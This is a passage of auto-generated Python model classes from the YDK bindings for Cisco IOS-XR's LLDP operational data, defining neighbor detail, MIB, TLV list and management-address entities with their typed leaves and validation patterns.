self.port_id_detail = None
self.header_version = None
self.hold_time = None
self.enabled_capabilities = None
self.platform = None
self.detail = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail()
self.detail.parent = self
self._children_name_map["detail"] = "detail"
self.mib = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib()
self.mib.parent = self
self._children_name_map["mib"] = "mib"
self._segment_path = lambda: "lldp-neighbor"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor, ['receiving_interface_name', 'receiving_parent_interface_name', 'device_id', 'chassis_id', 'port_id_detail', 'header_version', 'hold_time', 'enabled_capabilities', 'platform'], name, value)
class Detail(Entity):
"""
Detailed neighbor info
.. attribute:: network_addresses
Management Addresses
**type**\: :py:class:`NetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses>`
.. attribute:: peer_mac_address
Peer Mac Address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
.. attribute:: port_description
Port Description
**type**\: str
.. attribute:: system_name
System Name
**type**\: str
.. attribute:: system_description
System Description
**type**\: str
.. attribute:: time_remaining
Time remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: system_capabilities
System Capabilities
**type**\: str
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: auto_negotiation
Auto Negotiation
**type**\: str
.. attribute:: physical_media_capabilities
Physical media capabilities
**type**\: str
.. attribute:: media_attachment_unit_type
Media Attachment Unit type
**type**\: int
**range:** 0..4294967295
.. attribute:: port_vlan_id
Vlan ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail, self).__init__()
self.yang_name = "detail"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network-addresses", ("network_addresses", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses))])
self._leafs = OrderedDict([
('peer_mac_address', (YLeaf(YType.str, 'peer-mac-address'), ['str'])),
('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
('system_description', (YLeaf(YType.str, 'system-description'), ['str'])),
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('system_capabilities', (YLeaf(YType.str, 'system-capabilities'), ['str'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('auto_negotiation', (YLeaf(YType.str, 'auto-negotiation'), ['str'])),
('physical_media_capabilities', (YLeaf(YType.str, 'physical-media-capabilities'), ['str'])),
('media_attachment_unit_type', (YLeaf(YType.uint32, 'media-attachment-unit-type'), ['int'])),
('port_vlan_id', (YLeaf(YType.uint32, 'port-vlan-id'), ['int'])),
])
self.peer_mac_address = None
self.port_description = None
self.system_name = None
self.system_description = None
self.time_remaining = None
self.system_capabilities = None
self.enabled_capabilities = None
self.auto_negotiation = None
self.physical_media_capabilities = None
self.media_attachment_unit_type = None
self.port_vlan_id = None
self.network_addresses = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses()
self.network_addresses.parent = self
self._children_name_map["network_addresses"] = "network-addresses"
self._segment_path = lambda: "detail"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail, ['peer_mac_address', 'port_description', 'system_name', 'system_description', 'time_remaining', 'system_capabilities', 'enabled_capabilities', 'auto_negotiation', 'physical_media_capabilities', 'media_attachment_unit_type', 'port_vlan_id'], name, value)
class NetworkAddresses(Entity):
"""
Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses, self).__init__()
self.yang_name = "network-addresses"
self.yang_parent_name = "detail"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry))])
self._leafs = OrderedDict()
self.lldp_addr_entry = YList(self)
self._segment_path = lambda: "network-addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses, [], name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, self).__init__()
self.yang_name = "lldp-addr-entry"
self.yang_parent_name = "network-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address))])
self._leafs = OrderedDict([
('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
])
self.ma_subtype = None
self.if_num = None
self.address = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address()
self.address.parent = self
self._children_name_map["address"] = "address"
self._segment_path = lambda: "lldp-addr-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry, ['ma_subtype', 'if_num'], name, value)
class Address(Entity):
"""
Network layer address
.. attribute:: address_type
AddressType
**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: ipv6_address
IPv6 address
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, self).__init__()
self.yang_name = "address"
self.yang_parent_name = "lldp-addr-entry"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('address_type', (YLeaf(YType.enumeration, 'address-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper', 'LldpL3AddrProtocol', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.address_type = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "address"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Detail.NetworkAddresses.LldpAddrEntry.Address, ['address_type', 'ipv4_address', 'ipv6_address'], name, value)
class Mib(Entity):
"""
MIB nieghbor info
.. attribute:: unknown_tlv_list
Unknown TLV list
**type**\: :py:class:`UnknownTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList>`
.. attribute:: org_def_tlv_list
Org Def TLV list
**type**\: :py:class:`OrgDefTlvList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList>`
.. attribute:: rem_time_mark
TimeFilter
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_local_port_num
LldpPortNumber
**type**\: int
**range:** 0..4294967295
.. attribute:: rem_index
lldpRemIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: chassis_id_sub_type
Chassis ID sub type
**type**\: int
**range:** 0..255
.. attribute:: chassis_id_len
Chassis ID length
**type**\: int
**range:** 0..65535
.. attribute:: port_id_sub_type
Port ID sub type
**type**\: int
**range:** 0..255
.. attribute:: port_id_len
Port ID length
**type**\: int
**range:** 0..65535
.. attribute:: combined_capabilities
Supported and combined cpabilities
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib, self).__init__()
self.yang_name = "mib"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("unknown-tlv-list", ("unknown_tlv_list", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList)), ("org-def-tlv-list", ("org_def_tlv_list", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList))])
self._leafs = OrderedDict([
('rem_time_mark', (YLeaf(YType.uint32, 'rem-time-mark'), ['int'])),
('rem_local_port_num', (YLeaf(YType.uint32, 'rem-local-port-num'), ['int'])),
('rem_index', (YLeaf(YType.uint32, 'rem-index'), ['int'])),
('chassis_id_sub_type', (YLeaf(YType.uint8, 'chassis-id-sub-type'), ['int'])),
('chassis_id_len', (YLeaf(YType.uint16, 'chassis-id-len'), ['int'])),
('port_id_sub_type', (YLeaf(YType.uint8, 'port-id-sub-type'), ['int'])),
('port_id_len', (YLeaf(YType.uint16, 'port-id-len'), ['int'])),
('combined_capabilities', (YLeaf(YType.uint32, 'combined-capabilities'), ['int'])),
])
self.rem_time_mark = None
self.rem_local_port_num = None
self.rem_index = None
self.chassis_id_sub_type = None
self.chassis_id_len = None
self.port_id_sub_type = None
self.port_id_len = None
self.combined_capabilities = None
self.unknown_tlv_list = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList()
self.unknown_tlv_list.parent = self
self._children_name_map["unknown_tlv_list"] = "unknown-tlv-list"
self.org_def_tlv_list = Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList()
self.org_def_tlv_list.parent = self
self._children_name_map["org_def_tlv_list"] = "org-def-tlv-list"
self._segment_path = lambda: "mib"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib, ['rem_time_mark', 'rem_local_port_num', 'rem_index', 'chassis_id_sub_type', 'chassis_id_len', 'port_id_sub_type', 'port_id_len', 'combined_capabilities'], name, value)
class UnknownTlvList(Entity):
"""
Unknown TLV list
.. attribute:: lldp_unknown_tlv_entry
lldp unknown tlv entry
**type**\: list of :py:class:`LldpUnknownTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList, self).__init__()
self.yang_name = "unknown-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-unknown-tlv-entry", ("lldp_unknown_tlv_entry", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry))])
self._leafs = OrderedDict()
self.lldp_unknown_tlv_entry = YList(self)
self._segment_path = lambda: "unknown-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList, [], name, value)
class LldpUnknownTlvEntry(Entity):
"""
lldp unknown tlv entry
.. attribute:: tlv_type
Unknown TLV type
**type**\: int
**range:** 0..255
.. attribute:: tlv_value
Unknown TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, self).__init__()
self.yang_name = "lldp-unknown-tlv-entry"
self.yang_parent_name = "unknown-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('tlv_type', (YLeaf(YType.uint8, 'tlv-type'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.tlv_type = None
self.tlv_value = None
self._segment_path = lambda: "lldp-unknown-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.UnknownTlvList.LldpUnknownTlvEntry, ['tlv_type', 'tlv_value'], name, value)
class OrgDefTlvList(Entity):
"""
Org Def TLV list
.. attribute:: lldp_org_def_tlv_entry
lldp org def tlv entry
**type**\: list of :py:class:`LldpOrgDefTlvEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList, self).__init__()
self.yang_name = "org-def-tlv-list"
self.yang_parent_name = "mib"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-org-def-tlv-entry", ("lldp_org_def_tlv_entry", Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry))])
self._leafs = OrderedDict()
self.lldp_org_def_tlv_entry = YList(self)
self._segment_path = lambda: "org-def-tlv-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList, [], name, value)
class LldpOrgDefTlvEntry(Entity):
"""
lldp org def tlv entry
.. attribute:: oui
Organizationally Unique Identifier
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_subtype
Org Def TLV subtype
**type**\: int
**range:** 0..255
.. attribute:: tlv_info_indes
lldpRemOrgDefInfoIndex
**type**\: int
**range:** 0..4294967295
.. attribute:: tlv_value
Org Def TLV payload
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, self).__init__()
self.yang_name = "lldp-org-def-tlv-entry"
self.yang_parent_name = "org-def-tlv-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('oui', (YLeaf(YType.uint32, 'oui'), ['int'])),
('tlv_subtype', (YLeaf(YType.uint8, 'tlv-subtype'), ['int'])),
('tlv_info_indes', (YLeaf(YType.uint32, 'tlv-info-indes'), ['int'])),
('tlv_value', (YLeaf(YType.str, 'tlv-value'), ['str'])),
])
self.oui = None
self.tlv_subtype = None
self.tlv_info_indes = None
self.tlv_value = None
self._segment_path = lambda: "lldp-org-def-tlv-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Devices.Device.LldpNeighbor.Mib.OrgDefTlvList.LldpOrgDefTlvEntry, ['oui', 'tlv_subtype', 'tlv_info_indes', 'tlv_value'], name, value)
class Details(Entity):
"""
The detailed LLDP neighbor table
.. attribute:: detail
Detailed information about a LLDP neighbor entry
**type**\: list of :py:class:`Detail <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details, self).__init__()
self.yang_name = "details"
self.yang_parent_name = "neighbors"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Details.Detail))])
self._leafs = OrderedDict()
self.detail = YList(self)
self._segment_path = lambda: "details"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details, [], name, value)
class Detail(Entity):
"""
Detailed information about a LLDP neighbor
entry
.. attribute:: interface_name
The interface name
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
The neighboring device identifier
**type**\: str
.. attribute:: lldp_neighbor
lldp neighbor
**type**\: list of :py:class:`LldpNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail, self).__init__()
self.yang_name = "detail"
self.yang_parent_name = "details"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-neighbor", ("lldp_neighbor", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor))])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
])
self.interface_name = None
self.device_id = None
self.lldp_neighbor = YList(self)
self._segment_path = lambda: "detail"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail, ['interface_name', 'device_id'], name, value)
class LldpNeighbor(Entity):
"""
lldp neighbor
.. attribute:: detail
Detailed neighbor info
**type**\: :py:class:`Detail_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_>`
.. attribute:: mib
MIB nieghbor info
**type**\: :py:class:`Mib <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib>`
.. attribute:: receiving_interface_name
Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: receiving_parent_interface_name
Parent Interface the neighbor entry was received on
**type**\: str
**pattern:** [a\-zA\-Z0\-9.\_/\-]+
.. attribute:: device_id
Device identifier
**type**\: str
.. attribute:: chassis_id
Chassis id
**type**\: str
.. attribute:: port_id_detail
Outgoing port identifier
**type**\: str
.. attribute:: header_version
Version number
**type**\: int
**range:** 0..255
.. attribute:: hold_time
Remaining hold time
**type**\: int
**range:** 0..65535
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: platform
Platform type
**type**\: str
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor, self).__init__()
self.yang_name = "lldp-neighbor"
self.yang_parent_name = "detail"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("detail", ("detail", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_)), ("mib", ("mib", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib))])
self._leafs = OrderedDict([
('receiving_interface_name', (YLeaf(YType.str, 'receiving-interface-name'), ['str'])),
('receiving_parent_interface_name', (YLeaf(YType.str, 'receiving-parent-interface-name'), ['str'])),
('device_id', (YLeaf(YType.str, 'device-id'), ['str'])),
('chassis_id', (YLeaf(YType.str, 'chassis-id'), ['str'])),
('port_id_detail', (YLeaf(YType.str, 'port-id-detail'), ['str'])),
('header_version', (YLeaf(YType.uint8, 'header-version'), ['int'])),
('hold_time', (YLeaf(YType.uint16, 'hold-time'), ['int'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('platform', (YLeaf(YType.str, 'platform'), ['str'])),
])
self.receiving_interface_name = None
self.receiving_parent_interface_name = None
self.device_id = None
self.chassis_id = None
self.port_id_detail = None
self.header_version = None
self.hold_time = None
self.enabled_capabilities = None
self.platform = None
self.detail = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_()
self.detail.parent = self
self._children_name_map["detail"] = "detail"
self.mib = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Mib()
self.mib.parent = self
self._children_name_map["mib"] = "mib"
self._segment_path = lambda: "lldp-neighbor"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor, ['receiving_interface_name', 'receiving_parent_interface_name', 'device_id', 'chassis_id', 'port_id_detail', 'header_version', 'hold_time', 'enabled_capabilities', 'platform'], name, value)
class Detail_(Entity):
"""
Detailed neighbor info
.. attribute:: network_addresses
Management Addresses
**type**\: :py:class:`NetworkAddresses <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses>`
.. attribute:: peer_mac_address
Peer Mac Address
**type**\: str
**pattern:** [0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2}){5}
.. attribute:: port_description
Port Description
**type**\: str
.. attribute:: system_name
System Name
**type**\: str
.. attribute:: system_description
System Description
**type**\: str
.. attribute:: time_remaining
Time remaining
**type**\: int
**range:** 0..4294967295
.. attribute:: system_capabilities
System Capabilities
**type**\: str
.. attribute:: enabled_capabilities
Enabled Capabilities
**type**\: str
.. attribute:: auto_negotiation
Auto Negotiation
**type**\: str
.. attribute:: physical_media_capabilities
Physical media capabilities
**type**\: str
.. attribute:: media_attachment_unit_type
Media Attachment Unit type
**type**\: int
**range:** 0..4294967295
.. attribute:: port_vlan_id
Vlan ID
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_, self).__init__()
self.yang_name = "detail"
self.yang_parent_name = "lldp-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network-addresses", ("network_addresses", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses))])
self._leafs = OrderedDict([
('peer_mac_address', (YLeaf(YType.str, 'peer-mac-address'), ['str'])),
('port_description', (YLeaf(YType.str, 'port-description'), ['str'])),
('system_name', (YLeaf(YType.str, 'system-name'), ['str'])),
('system_description', (YLeaf(YType.str, 'system-description'), ['str'])),
('time_remaining', (YLeaf(YType.uint32, 'time-remaining'), ['int'])),
('system_capabilities', (YLeaf(YType.str, 'system-capabilities'), ['str'])),
('enabled_capabilities', (YLeaf(YType.str, 'enabled-capabilities'), ['str'])),
('auto_negotiation', (YLeaf(YType.str, 'auto-negotiation'), ['str'])),
('physical_media_capabilities', (YLeaf(YType.str, 'physical-media-capabilities'), ['str'])),
('media_attachment_unit_type', (YLeaf(YType.uint32, 'media-attachment-unit-type'), ['int'])),
('port_vlan_id', (YLeaf(YType.uint32, 'port-vlan-id'), ['int'])),
])
self.peer_mac_address = None
self.port_description = None
self.system_name = None
self.system_description = None
self.time_remaining = None
self.system_capabilities = None
self.enabled_capabilities = None
self.auto_negotiation = None
self.physical_media_capabilities = None
self.media_attachment_unit_type = None
self.port_vlan_id = None
self.network_addresses = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses()
self.network_addresses.parent = self
self._children_name_map["network_addresses"] = "network-addresses"
self._segment_path = lambda: "detail"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_, ['peer_mac_address', 'port_description', 'system_name', 'system_description', 'time_remaining', 'system_capabilities', 'enabled_capabilities', 'auto_negotiation', 'physical_media_capabilities', 'media_attachment_unit_type', 'port_vlan_id'], name, value)
class NetworkAddresses(Entity):
"""
Management Addresses
.. attribute:: lldp_addr_entry
lldp addr entry
**type**\: list of :py:class:`LldpAddrEntry <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry>`
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses, self).__init__()
self.yang_name = "network-addresses"
self.yang_parent_name = "detail"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lldp-addr-entry", ("lldp_addr_entry", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry))])
self._leafs = OrderedDict()
self.lldp_addr_entry = YList(self)
self._segment_path = lambda: "network-addresses"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses, [], name, value)
class LldpAddrEntry(Entity):
"""
lldp addr entry
.. attribute:: address
Network layer address
**type**\: :py:class:`Address <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address>`
.. attribute:: ma_subtype
MA sub type
**type**\: int
**range:** 0..255
.. attribute:: if_num
Interface num
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'ethernet-lldp-oper'
_revision = '2017-11-13'
def __init__(self):
super(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry, self).__init__()
self.yang_name = "lldp-addr-entry"
self.yang_parent_name = "network-addresses"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("address", ("address", Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address))])
self._leafs = OrderedDict([
('ma_subtype', (YLeaf(YType.uint8, 'ma-subtype'), ['int'])),
('if_num', (YLeaf(YType.uint32, 'if-num'), ['int'])),
])
self.ma_subtype = None
self.if_num = None
self.address = Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry.Address()
self.address.parent = self
self._children_name_map["address"] = "address"
self._segment_path = lambda: "lldp-addr-entry"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(Lldp.Nodes.Node.Neighbors.Details.Detail.LldpNeighbor.Detail_.NetworkAddresses.LldpAddrEntry, ['ma_subtype', 'if_num'], name, value)
class Address(Entity):
"""
Network layer address
.. attribute:: address_type
AddressType
**type**\: :py:class:`LldpL3AddrProtocol <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ethernet_lldp_oper.LldpL3AddrProtocol>`
.. attribute:: ipv4_address
IPv4 address
**type**\: str
